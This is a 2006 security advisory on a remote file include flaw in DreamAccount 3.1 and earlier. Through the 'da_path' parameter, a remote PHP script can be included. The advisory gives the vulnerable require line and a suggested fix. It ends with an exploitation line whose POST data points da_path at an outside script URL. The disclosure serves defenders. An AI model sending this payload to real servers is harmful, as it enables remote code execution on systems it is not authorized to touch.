[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability
------------------------------------------------------------------------- Software: DreamAccount Version: <=3.1 Type: Remote File Include Vulnerability Date: June, 3rd 2006 Vendor: dreamcost Page: http://dreamcost.com Risc: High Credits: ---------------------------- Discovered by: David 'Aesthetico' Vieira-Kurz http://www.majorsecurity.de Original Advisory: ---------------------------- http://www.majorsecurity.de/advisory/major_rls8.txt Affected Products: ---------------------------- DreamAccount 3.1 and prior Description: ---------------------------- DreamAccount is a membership and subscription software application that is both simple to use and install, while remaining affordable enough for even the smallest startup. Requirements: ---------------------------- register_globals = On Vulnerability: ---------------------------- Input passed to the "da_path" parameter in "auth.cookie.inc.php" is not properly verified, before it is used to include files. This can be exploited to execute arbitrary code by including files from external resources. Solution: ---------------------------- I think you can fix this bug by replacing the following vulnerable code in the "auth.cookie.inc.php" with my one. It should fix the vulnerabilty and solve this problem. Vulnerable one: "require($da_path . "setup.php");" MajorSecurity fix: "require("setup.php");" Set "register_globals" to "Off". Exploitation: ---------------------------- Post data: da_path=http://www.yourspace.com/yourscript.php?
